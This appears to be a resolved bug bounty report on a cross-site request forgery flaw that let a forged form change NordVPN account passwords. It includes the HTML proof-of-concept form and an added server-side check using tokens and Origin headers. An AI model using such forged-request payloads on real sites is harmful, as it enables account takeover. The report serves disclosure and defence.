
CSRF to change password

Critical
Nord Security
Submitted None
Reported by paramdham

Vulnerability Details

Technical details and impact analysis

Cross-Site Request Forgery (CSRF)
Description

Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.

I have found CSRF to change password, POC:

    <html>
      <body>
        <form action="https://nordvpn.com/profile/" method="POST">
          <input type="hidden" name="tmpl" value="settings" />
          <input type="hidden" name="password" value="password" />
          <input type="hidden" name="password&#95;confirmation" value="password" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

Thanks
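The form in the PoC above carries no anti-CSRF token field. A server-side gate that rejects a request of that shape, added here as an example (it is not code from the report or from Nord Security); the secret, session id and `csrf_token` field name are assumptions:

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions (hypothetical, not from the report): a per-deployment secret,
# a server-side session id, and a hidden form field named "csrf_token".
SERVER_SECRET = secrets.token_bytes(32)
ALLOWED_ORIGIN = "https://nordvpn.com"  # origin of the PoC's form action

def _mac(session_id: str, nonce: str) -> bytes:
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest().encode()

def issue_csrf_token(session_id: str) -> str:
    """Session-bound token the server embeds in its own settings form."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce).decode()}"

def csrf_token_valid(session_id: str, token: str) -> bool:
    nonce, sep, sig = (token or "").partition(".")
    if not (sep and nonce and sig):
        return False
    return hmac.compare_digest(_mac(session_id, nonce), sig.encode())

def same_origin(headers: dict) -> bool:
    """Check Origin, falling back to Referer; reject when both are absent."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == ALLOWED_ORIGIN

def allow_password_change(session_id: str, headers: dict, form: dict) -> bool:
    """Gate for the state-changing POST: both checks must pass."""
    return same_origin(headers) and csrf_token_valid(
        session_id, form.get("csrf_token", ""))

# Constructed sample requests. FORGED carries the PoC's fields (no token) and
# a foreign Origin; LEGIT is a submission of the site's own form.
SESSION = "constructed-session-id"
FORGED = ({"Origin": "https://attacker.example"},
          {"tmpl": "settings", "password": "password",
           "password_confirmation": "password"})
LEGIT = ({"Origin": ALLOWED_ORIGIN},
         {"tmpl": "settings", "password": "constructed-new-pass",
          "password_confirmation": "constructed-new-pass",
          "csrf_token": issue_csrf_token(SESSION)})
```

`allow_password_change(SESSION, *FORGED)` is rejected on both checks, while the same call with `LEGIT` passes; a token issued for a different session fails even when the Origin matches.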

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-Site Request Forgery (CSRF)